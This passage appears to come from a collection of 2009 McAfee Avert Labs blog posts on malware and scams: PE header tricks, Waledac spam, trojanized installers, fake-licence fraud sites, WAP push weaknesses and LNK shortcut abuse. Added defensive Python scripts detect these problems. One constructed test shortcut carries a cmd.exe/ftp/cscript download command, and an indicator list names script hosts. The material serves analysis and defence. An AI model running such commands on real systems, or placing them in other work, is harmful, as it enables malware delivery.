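def build_section(name, vsize, va, raw_size, raw_ptr, chars=0x60000020):
    """Pack one IMAGE_SECTION_HEADER (relocation/line-number fields zeroed)."""
    return SECTION_HDR.pack(name.ljust(8, b"\0")[:8], vsize, va, raw_size,
                            raw_ptr, 0, 0, 0, 0, chars)


# Constructed section table. The raw sizes FF003000/FF000200 against virtual
# sizes 3000/1000 are the values the post describes; the VirtualAddress and
# PointerToRawData values and the third section holding the entry point are
# assumptions so that the example runs stand-alone.
SECTION_TABLE = b"".join([
    build_section(b".text",  0x3000, 0x1000,  0xFF003000, 0x400),
    build_section(b".rdata", 0x1000, 0x4000,  0xFF000200, 0x3400),
    build_section(b".code",  0x1000, 0x1A000, 0x200,      0x10C00),
])


def parse_sections(table):
    """Parse a raw section table into a list of dicts."""
    sections = []
    for off in range(0, len(table) - SECTION_HDR.size + 1, SECTION_HDR.size):
        name, vsize, va, raw_size, raw_ptr, *_ = SECTION_HDR.unpack_from(table, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va,
                         "raw_size": raw_size, "raw_ptr": raw_ptr})
    return sections


def section_anomalies(sections, file_size):
    """Flag section headers whose raw data cannot exist in a file of this size."""
    findings = []
    for s in sections:
        if s["raw_size"] == 0:
            findings.append(f"{s['name']}: SizeOfRawData is 0 (no file-backed data)")
        elif s["raw_ptr"] + s["raw_size"] > file_size:
            findings.append(f"{s['name']}: SizeOfRawData {s['raw_size']:#x} at offset "
                            f"{s['raw_ptr']:#x} runs past end of file ({file_size:#x})")
    return findings


def rva_to_offset_naive(rva, sections, file_size):
    """Mapper that trusts SizeOfRawData for a section's extent. The oversized
    first section captures the entry-point RVA and the computed offset lies
    beyond the end of the file, so the lookup fails (None)."""
    for s in sections:
        span = max(s["vsize"], s["raw_size"])
        if s["va"] <= rva < s["va"] + span:
            off = s["raw_ptr"] + (rva - s["va"])
            return off if off < file_size else None
    return None


def rva_to_offset(rva, sections, file_size):
    """Hardened mapper: the in-memory extent is VirtualSize, and the raw data
    available for a section is clamped to what the file actually contains."""
    for s in sections:
        if s["va"] <= rva < s["va"] + s["vsize"]:
            delta = rva - s["va"]
            raw_avail = max(0, min(s["raw_size"], file_size - s["raw_ptr"]))
            return s["raw_ptr"] + delta if delta < raw_avail else None
    return None


def entry_point_offset(image_base, entry_rva, sections, file_size):
    """Return (virtual address, file offset) of the entry point."""
    return image_base + entry_rva, rva_to_offset(entry_rva, sections, file_size)


if __name__ == "__main__":
    secs = parse_sections(SECTION_TABLE)
    for finding in section_anomalies(secs, FILE_SIZE):
        print("anomaly:", finding)
    print("naive EP offset:", rva_to_offset_naive(ENTRY_RVA, secs, FILE_SIZE))
    va, off = entry_point_offset(IMAGE_BASE, ENTRY_RVA, secs, FILE_SIZE)
    print(f"EP VA {va:#x} -> file offset {off:#x}")
```

    The anomaly check is the part worth keeping in any triage script: a SizeOfRawData that, added to PointerToRawData, exceeds the file length can never be honest, and flagging it before disassembly avoids the dead end the post describes.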

    IDA Error

    Olly on the other hand mentions the large section size but still loads it comfortably.

    Clearly the authors are attempting social engineering here by crafting the section table. Another view is that this technique might also trick certain AV products into mis-loading such files. We’d like to hear your thoughts too…

    So the moral of the story is, don’t judge a book by its cover or malware based on only one tool, drink more coffee and keep at it. Happy Researching !!  [We currently detect this as Spy-Agent.dp.gen]

    McAfee Debuts ‘Combating Threats’ Series

    McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

    UPDATE MARCH 17th

    Apologies for the busted links yesterday. All seem to be resolving fine now.

    Malware Riding on the Tides of the Economic Crisis

    A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys want precisely to fool people trying to save some money these days. Spam mails promoting bargains that could help in the recession are hitting inboxes right now.

    When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

    After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

    In economically hard times, the malware authors do not rely only on clever and timely social engineering; they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and inserts the actual location into the website texts. When victims see coupons for exactly their own town, the bargain list becomes that much more enticing.

    As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

    MS09-002 Exploit in the wild uses MSWord Lure

    An exploit targeting a recently patched vulnerability in Internet Explorer 7 has been discovered in the wild. Malware crooks were quick to develop a working exploit for the vulnerability in Internet Explorer 7, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical, with consistent exploit code considered likely. The modus operandi bears close resemblance to the zero-day attack using Word documents that we blogged about in December 2008.

    The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This Word document contains an embedded ActiveX control which, upon opening, connects to a website hosting the MS09-002 exploit.

    Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

    The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

    For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

    The malicious Word document is detected with the current DATs as Exploit-MSWord.k, and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

    Trojan Bundles Legit Social-Network Toolbar with Backdoor

    Here’s another twist in regionally targeted attacks: A new Trojan (pretending to be a toolbar installer) is spreading that bundles the legitimate toolbar for the German social network “StudiVZ” with a variant of Backdoor-CEP. Among other malicious activities, the backdoor is capable of recording a user’s screen, taking screenshots, and logging keyboard strokes. At first glance, the deliberately modified installer looks perfectly harmless, especially because it refuses to do anything malicious if it detects certain security products or if it thinks it’s being observed through a sandbox or a debugger.

    Behind the curtain, however, a lot of non-kosher things happen. The installer injects parts of the bundled malicious code into running processes or starts a legitimate process in suspended state, and then unmaps its content and remaps different, malicious content to the process before resuming it again. The malicious code is hard to detect because it is decrypted and injected into memory and never written to disk.

    Disassembly of the backdoor creating a suspended process

    After the toolbar’s installer has finished, it automatically runs an instance of Internet Explorer to open http://studivz.net, which is the social network’s login site. With the newly installed toolbar clearly visible now through additional controls and logos on top, the user’s next step will most probably be to log into the social networking site.

    At this point the backdoor has already infected a number of running processes in memory and installed a callback to capture and save any keystrokes.

    Part of the backdoor's keylogging code

    The author of this variant of Backdoor-CEP seems to be particularly interested in the credentials of StudiVZ; the Trojan also makes periodic connection attempts to a host located in Germany. Fortunately for McAfee customers, the malicious installer is blocked by Artemis and is blocked at the (former Secure Computing) Web Gateway.

    New Valentine Scam on the Loose

    Following our warning, last week, of the possible scams related to the approaching Valentine’s Day, it’s no surprise that today we’ve seen another new Valentine theme come up–hosted on the fast-fluxing Waledac botnet. If a user were to follow the link in these spam emails–and please don’t do that!–a web site like the following would appear:

    A picture of two adorable Shih Tzu puppies wishes a Happy Valentine’s Day. The text of the lure is advertising a “Valentine Devkit” named loveexe.exe or start.exe. Regular readers can guess it already: this is a social-engineering trick to convince users to download the real threat. Don’t click the link to the executable or you will end up with malware.

    A close look into the website’s source code doesn’t currently reveal any additional drive-by infections or downloads (but that can change quickly), as seen in past Waledac (or “Storm”) themes. Coverage of this particular malware variant is in the 5522 DATs; it is also blocked by Artemis and at the (former Secure Computing) Web Gateway.

    Cybercrime, Online Threats, and the Recession

    As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

    A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

    Our Main Threat Predictions/Trends for 2009:

    • Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

    • Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

    • Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

    • Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

    • Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

    • More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

    • Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

    • Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

    • An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

    • More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

    • Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

    • McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

    • New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

    In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

    Fake Licenses on the Rise

    Since at least the year 2000, email scams selling International Driver Licenses have circulated around the net. The authors explained that with their documents buyers could avoid having to pay traffic tickets, and could establish new identities for hotel check-ins or bar entrance (if the buyers are underage). Lately these offers have grown.

    Yesterday, I came across such an ad; it was in French and promoted a site offering a replacement driver license in place of a regular one:

    Because of its name (backdoordl), the website aroused my curiosity. I followed the link and, one thing leading to another, I discovered the extent of this fraud.

    At backdoordl, I found a professional website divided into three areas: French, German and English.

    In the UK area, I recognized text that was similar to what I first saw in French:

    Have you lost your existing licence? No problem! Can’t remember the details? No problem! Need a clean licence? No problem! Need motorcycle, car, bus, hgv entitlement? No problem! Over 65? No problem! Medical problems? No problem!

    There are 110 models of drivers licences in current use throughout the European Union, that’s not to mention drivers licences issued outside of the EU that are still accepted for exchange in different EU countries. This service is directed at any resident or non-resident of the United Kingdom or EU that wishes to obtain a full driving licence without any tests. So no matter what country you are a resident or citizen of, they claim they can help. Even if you live outside of the UK or EU! Once you have a driving licence through them, you can exchange it in your own country for a local licence. EU driving licences are accepted ‘as is’ worldwide for driving and exchange. It does not matter what nationality you are!

    The office address, undoubtedly fake, written into the contact page was in the UK. There was no phone number; they said it would be provided only to clients who ordered. Despite some inconsistencies here and there, the site also explained that the company did not accept any postal contact. Because a photo and signature were needed to create the new driving license, they had to be scanned by the buyer and then sent via email.

    The registrar was ENOM Inc., and the registration details were protected via the “WhoisGuard” service, thus masking the true identity of the domain-name registrant and preventing public access to that information through its (and any) WHOIS database.

    Getting on with my searches, I discovered the backdoordl site was not unique. Almost half a dozen nearly exact copies were also easily available online:

    The domain registrants’ WHOIS information is also hidden or filled with seemingly bogus data.

    At backdoordl and its clones, prices seem consistent: £359 GBP or 399 Euros with payment encouraged via Western Union. There are two ways to obtain the documents:

    First way is to exchange your current driving licence, you complete our application form and we print it out and translate some of your driving licence and translate the application form, put it all together and apply for an EU licence. This is a way to obtain driving categories that you select on the application form as the foreign issuing authority will look at the translation and not the licence.
    The second way is to make a declaration that your licence has been lost/mislaid/stolen in a certain country that we know about. No other proof that you have even passed a test is required, just your sworn declaration. They will issue you with a temporary driving licence which we can then get translated and exchanged for an EU licence. SNEAKY? Yes, but Illegal? We have been advised NO.

    The advertised licence process is said to take approximately 21 days.

    I also discovered this language localization was not unique. During further searches, I found the AldaLegal offer and its clone, DLtransfer. Here too, these crooks speak your language. The sites are available not only in French, German, and English, but also in Spanish and Chinese.


    Here, the offer is better rounded and not limited to the European Community:

    For both sites, the company address written at the bottom of the contact pages is the same: in Australia (215 Harris St., Sydney NSW 2009). Using Google I got hold of a Word document at the bottom of a directory path: a standard letter perhaps used by the guy behind this rip-off. It would appear they also offer help for illegal immigration.

     

    Finally, two other sites attracted me: eudriverlicence and licencetoday. Here too, the seller expresses himself without restraint:

    They clearly explain the two ways to obtain such a licence. As before, with the first one the buyer has to provide partial information from his actual licence. As a result, the crooks promise an EU driver licence coming from one of the following countries: Cyprus, Czech Republic, Estonia, Hungary, Latvia, Lithuania, Malta, Poland, and Slovenia. The price is around 400 Euros.

    With the second way, for applicants who do not or cannot submit any license details (only scanned photo and signature via email), the sites explain they can apply outside the European Union (Africa or a South American country):

    All you need to do is check box A “Outside the E.U. Temporary Drivers Licence” on the application form and by ticking the box you declare you have had your licence lost/mislaid/stolen. Then by submitting the application along with further forms, which we submit, we can then obtain a temporary driving licence.

    Here an extra service charge of 100 Euros is applied, so the total cost becomes 500 Euros.

    These sites are not fully duplicated, but the texts look very similar. One company is Martin and Benn Associates. Its address is said to be in Gibraltar (Victoria House, 26 Main St.). The other is said to be in Germany.

    At fraudwatchers, a contributor in Gibraltar went down to the alleged offices of Martin and Benn Associates. He found the company neither in the building nor in the Gibraltar telephone book. To prove this, he provided the following picture:

    The risks are numerous in a story like this. The first one: you are not assured of receiving the document at all. Your bank account will certainly be debited, but getting the licence in return is less certain. And fear the worst for the personal data (plus your photo, plus your signature) that you send to these guys: this information would be perfect for making forged papers.

    Depending on regional laws, it may or may not be legal for these companies to produce such documents and to sell them to you, but it may not be legal for you to carry them, or to use them as a driving license. At the drivers.com website, they provide the truth:

    • An International Driving Permit is merely a translation of your regular driver’s license into almost a dozen languages.
    • It is not a driver’s license by itself.
    • You must still carry a valid, regular license from your country, even if you are also carrying an IDP.
    • Yes, the United Nations created a treaty, now signed by about 150 countries, but the IDP is not a license by itself. It is mainly to help police read licenses written in other languages.
    • You must purchase an IDP in your country of residence.
    • You must have a legal license from your country of residence in order to get an IDP.
    • No, you cannot use the IDP as a “license” inside your country of residence.
    • No, you do not get a new, separate driving record with an IDP. They cannot be used to hide violations or tickets: These are still recorded on your regular driver’s license.
    • Most countries authorize only certain organizations to sell IDPs. Check with your local government driver’s license authority.
    • In the USA, only two organizations are allowed to sell real, legal IDPs: the American Automobile Association (enter your location carefully), and the American Automobile Touring Alliance, which offers IDPs through the National Automobile Club.
    • In Canada, the only authorized distributor of legal IDPs is the CAA. Canadian IDPs are not valid in the USA.
    • In the USA and Canada, the cost of a real IDP is about $10.

    Being French, only one question left for me as I ended this post: Why do all these guys write “licence” with two “c’s”? I found the response in my dictionary: In the UK, “licence” is the noun and “license” is the verb. In American English, however, the noun is also spelled license. Another lead for the police :-) .

    Counting Malware

    Malware continues to increase at a rapid rate. With the DAT-5516 release, scheduled for 4 February, the number of drivers in the DATs will pass 500,000. Half a million is a huge amount. I remember my first antivirus program, back in the ’80s, that had a count of about 80. I don’t recall the exact number, but it’s easy to place it into perspective. We add way more on a daily basis now.

    However, our current count is not an absolute number of detected malware files; this can confuse many people. Drivers can be written very specifically, say one driver for one sample, but that’s not very effective. Most drivers are written to generically detect many samples. For example, one driver can detect 50 or as many as thousands of malware files. Therefore, the number of detected malware files is far higher than the half-million figure reflected in the DATs. For another look at the complexity of counting malware detections, please see François Paget’s blog as well.

    Initially VirusScan would focus just on true self-replicating viruses, mainly 8-bit (.com/.exe), MS-DOS viruses as well as boot viruses, which were prevalent then–and some still are today. Malware has evolved into many areas including, but not limited to, VBA, VBScript, JavaScript, 32-bit (pe-type .exe binaries) mass-mailers, 32-bit file infectors, mobile malware, adware and password stealers, and others. Nowadays the majority of malware is static Trojans.

    There has also been a big shift by the malware authors. The first malware authors were hobbyists, writing to prove it could be done, but today we mainly see malware that’s going after the money–password stealers, etc. Malware is often developed in professional environments, much like a business project with a plan.

    Although there is malware for operating systems such as Mac OSX and the various Linux/Unix versions, most malware is still targeted at Microsoft Windows and its applications.

    Chinese Zombie Count Falls but Still Outnumbers Those in U.S.

    China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

    The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It’s not clear what China is doing, but the vast number of computers that were controlled as zombies are no longer being used for that purpose. One certainly has to wonder what they are being used for.

    Additionally, in Switzerland (owner of the .ch domain), we have seen a big increase in the amount of spam offering “cheap” software.

    Clearly, money and profit are still the driving forces for malware and spam these days.

    Default Security Policies For HTC Touch Pro Not So Secure

    Recently I bought a new cell phone: the HTC Touch Pro. Great mobile phone. Opera Mobile Web surfing is handled great. The Sprint EV-DO Rev A network is fast and it’s the most stable smart phone I’ve had so far. As a security researcher naturally I had to dig deeper into how secure this mobile phone actually is. I quickly found out things that make me wonder if the mobile handset industry has learned anything from the desktop industry as far as protecting consumers.

    The first thing I did was look at the default security settings of the mobile phone. Windows Mobile keeps the policies in the registry under HKLM\Security\Policies\Policies. These policies are documented at http://msdn.microsoft.com/en-us/library/ms890461.aspx along with the recommended settings to use as a security baseline at http://msdn.microsoft.com/en-us/library/ms889564.aspx. The first thing I noticed is that some policy settings on my phone are, by default, different from the recommended settings. Below is the analysis of two of these changed policy settings:

    SL Message Policy
    Recommended Default: 2048 – SECROLE_PPG_TRUSTED
    Value on HTC Touch Pro: 0000100c: 2112
    Changed Value: (SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

    SI Message Policy
    Recommended Default: 3072 – (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED)
    Value on HTC Touch Pro: 0000100d: 3136
    Changed Value: (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

    These policy settings define WAP Push SI (Service Indication) and SL (Service Load). WAP was designed to be used by operators, administrators, and others to push software updates or even ringtones directly to the phone. For some unknown reason the HTC Touch Pro has broken from the recommended security policy and added a flag (SECROLE_USER_UNAUTH) that allows unauthenticated WAP Pushes from anyone. What does this mean? It means that an attacker can send a WAP push telling you to install spyware, like FlexiSpy, which gives them full control of your mobile handset. Once installed, the attacker can obtain your private data, your passwords, call logs, and even eavesdrop using the microphone. Sound familiar? And don’t think that it has to be a WAP push with a WAP gateway etc. That’s not the only impact these settings have. A specially crafted SMS can have the same effect as sending the WAP push through a gateway. A binary SMS message can contain a WAP SL Push (using SL as it can be used to force the downloading of spyware without user intervention or prompts) that instructs the mobile handset to go to a specific URL, get the spyware, and run the spyware after receiving it. In this case, all the attacker would need is the mobile handset phone number to send the binary SMS message to.

    Further research showed that binary SMS doesn’t seem to work on Sprint’s CDMA network. It is reported, though, that it does work on GSM networks such as AT&T’s. This makes me wonder what the default security policy is for WAP Pushes on AT&T’s version of the HTC Touch Pro, the HTC FUZE. In any case, unless you know you absolutely need this flag, set these security policies to the Microsoft recommended default values of 2048 and 3072 respectively. I use PHM Registry Editor, although any registry editor for Windows Mobile can be used.
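    The policy values above are bitmasks of SECROLE_* roles, so the cleanest way to audit a handset is to decode each value and diff it against the baseline rather than eyeball the decimal numbers. The script below is an added example, not code from the post or from Microsoft: it knows only the three role bits the post names (64, 1024 and 2048) and the two registry value names it quotes (0000100c and 0000100d), reports any other set bit as unknown, and takes the observed values as a plain dictionary (the sample values are the ones reported for the HTC Touch Pro; how you export them from the device is up to your registry editor).

```python
# Added example (not from the post): decode Windows Mobile security-policy bitmasks
# and report roles granted beyond the Microsoft-recommended baseline.

# SECROLE_* bit values for the three roles the post names; other bits are reported as unknown.
ROLE_NAMES = {
    0x0040: "SECROLE_USER_UNAUTH",   # 64: unauthenticated sender
    0x0400: "SECROLE_PPG_AUTH",      # 1024: authenticated push proxy gateway
    0x0800: "SECROLE_PPG_TRUSTED",   # 2048: trusted push proxy gateway
}

# Registry value names under HKLM\Security\Policies\Policies (as shown on the phone)
# mapped to the policy label and the recommended default quoted in the post.
BASELINE = {
    "0000100c": ("SL Message Policy", 2048),
    "0000100d": ("SI Message Policy", 3072),
}


def decode_roles(mask):
    """List the role names whose bits are set in mask, lowest bit first."""
    names = []
    bit = 1
    while bit <= mask:
        if mask & bit:
            names.append(ROLE_NAMES.get(bit, "UNKNOWN_0x%04x" % bit))
        bit <<= 1
    return names


def audit_policies(observed):
    """Compare observed {value_name: int} against BASELINE.

    Returns one finding per policy that deviates, listing the roles granted
    beyond the baseline (extra) and any baseline roles that are missing.
    """
    findings = []
    for value_name, (label, recommended) in BASELINE.items():
        if value_name not in observed:
            continue  # policy not exported; nothing to compare
        value = observed[value_name]
        extra = value & ~recommended
        missing = recommended & ~value
        if extra or missing:
            findings.append({
                "policy": label,
                "value_name": value_name,
                "observed": value,
                "recommended": recommended,
                "extra_roles": decode_roles(extra),
                "missing_roles": decode_roles(missing),
                # The bit that lets anyone push SI/SL messages without authentication.
                "unauthenticated_push": bool(extra & 0x0040),
            })
    return findings


# Constructed sample: the two values the post reports for the HTC Touch Pro.
HTC_TOUCH_PRO = {"0000100c": 2112, "0000100d": 3136}

if __name__ == "__main__":
    for f in audit_policies(HTC_TOUCH_PRO):
        print("%s (%s): observed %d, recommended %d, extra roles: %s" % (
            f["policy"], f["value_name"], f["observed"], f["recommended"],
            ", ".join(f["extra_roles"]) or "none"))
```

    Run against the Touch Pro values it reports SECROLE_USER_UNAUTH as the single extra role on both policies; run against 2048 and 3072 it reports nothing, which is the state the post recommends restoring.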

    Abusing Shortcut files

    Shortcuts, or LNK files, are small binary files that hold the path to an application, sometimes with optional parameters. They are used for running applications and are placed in folders where users can reach them easily, such as the Desktop and application launchers. LNK files are also placed in the Startup folder to run automatically at system boot. This indirect way of running applications is attractive to malware authors because shortcuts have not been brought to most users’ attention as a security concern the way executable files have. At Avert Labs, we have recently seen some malware abusing shortcut files to launch malicious files or scripts in several different ways. Here we introduce some methods we have recently seen:

    1. Create shortcut files linking to malware files
       This is an easy way to launch malware, either through a user’s action or on system reboot. These LNK files are created on the desktop, on network shares, and even in startup folders. One of the many variants of the Spy-Agent.bw trojan is known to take advantage of shortcuts to run.

    2. Parasitic infection of shortcuts
       We have seen the W32/Mokaksu virus modify all LNK files on the desktop and add the path of the malware file in front of the original path.

       The example above is the shortcut to Adobe Acrobat Reader infected with malware. The path to the malicious “Config.Msi.exe” (in the red box) is added before the original path “AcroRd32.exe” (in the yellow box). In the shortcut, the original path is treated as a parameter to the malware file. Upon clicking the shortcut, the W32/Mokaksu malware runs in the background and also executes the original file. Users only see the application associated with the shortcut launch, which makes the infection much harder to notice.

    3. Scripts in the shortcuts
       Shortcuts can also contain command lines for “cmd.exe” instead of linking to executable trojan files. The Downloader-BMF trojan is such a case.

       When users click on these LNK files, the script silently creates and drops FTP scripts that then download VBS scripts from FTP servers. The downloaded VBS scripts are then responsible for downloading trojan files.

    In the first two cases, shortcuts are merely a way of launching malware, whereas in the last case the LNK files are standalone malicious files: no other malicious executable is needed, only a legitimate “cmd.exe”. This type of LNK file can be attached to emails or hosted on websites, which means we need to be more careful with LNK files. Users can easily check a shortcut by browsing its file properties or viewing the file with a binary editor.

    If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.
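    The manual check suggested above (open the properties, or look at the bytes) can be automated: a .lnk file is an MS-SHLLINK structure whose StringData section carries the relative path and the arguments, and the two abuse patterns described here both show up there (an .exe path pushed into the arguments, or cmd.exe as the target with ftp/script commands as arguments). The script below is an added example, not code from the post or from Avert Labs: it builds three constructed shortcuts in memory (a benign one, a Mokaksu-style parasitic one, and a cmd.exe one modelled on the Downloader-BMF description), parses them with a minimal reader that handles the optional IDList and LinkInfo blocks, and flags the suspicious ones. The indicator list (script hosts, .vbs, ftp, .bat) is my own assumption, not a published signature.

```python
import struct

# Added example (not from the post): minimal MS-SHLLINK reader plus a heuristic
# check for the two shortcut-abuse patterns described in the text.

# LinkFlags bits from the ShellLinkHeader (only those this parser needs).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
HEADER_SIZE = 0x4C
# CLSID 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# StringData fields appear in this fixed order, each only if its flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def build_lnk(relative_path, arguments):
    """Construct a minimal Unicode .lnk carrying only RelativePath and Arguments (test data)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # attrs, times, size, icon, SW_SHOWNORMAL, ...
    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")  # CountCharacters + chars
    return header + string_data(relative_path) + string_data(arguments)


def parse_lnk(data):
    """Return the StringData fields of a shell link as a dict (unset fields are absent)."""
    if len(data) < HEADER_SIZE or data[:4] != struct.pack("<I", HEADER_SIZE) or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize (2 bytes) then the list itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                 # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


# Assumed indicator list for the heuristic below (not a published signature).
SCRIPT_HOSTS = ("cmd.exe", "ftp.exe", "cscript.exe", "wscript.exe")
SCRIPT_MARKERS = (".vbs", ".bat", "ftp")


def assess_shortcut(fields):
    """Return the reasons a shortcut looks suspicious; an empty list means nothing odd was seen."""
    reasons = []
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "").lower()
    if target.rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
        reasons.append("target is a script host: " + target)
    if ".exe" in args:  # Mokaksu pattern: the real program demoted to a parameter
        reasons.append("arguments contain an executable path (possible parasitic chaining)")
    if any(marker in args for marker in SCRIPT_MARKERS):
        reasons.append("arguments reference scripts or ftp")
    return reasons


# Constructed samples, not real malware: benign reader shortcut, parasitic one, cmd.exe one.
SAMPLES = {
    "benign": build_lnk(r"..\Program Files\Adobe\Reader\AcroRd32.exe", ""),
    "parasitic": build_lnk(r".\Config.Msi.exe", r"C:\Program Files\Adobe\Reader\AcroRd32.exe"),
    "script": build_lnk(r"..\Windows\System32\cmd.exe", "/c ftp -s:update.txt & cscript update.vbs"),
}


def scan_all(samples=SAMPLES):
    """Parse and assess every sample; returns {name: [reasons]}."""
    return {name: assess_shortcut(parse_lnk(blob)) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, reasons in scan_all().items():
        print(name, "->", reasons or "clean")
```

    To use it on a real file, read the bytes and pass them to parse_lnk; the builder exists only to produce offline test data and omits the IDList and LinkInfo blocks a real shortcut usually has, which the parser skips by their declared sizes.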

    Mac Trojans Follow Successful Windows Path

    It’s been a week since we’ve seen the new Mac malware, the iWork09 Trojan, which is disguised as pirated software. Since then there have been several reports about new Mac Trojans.

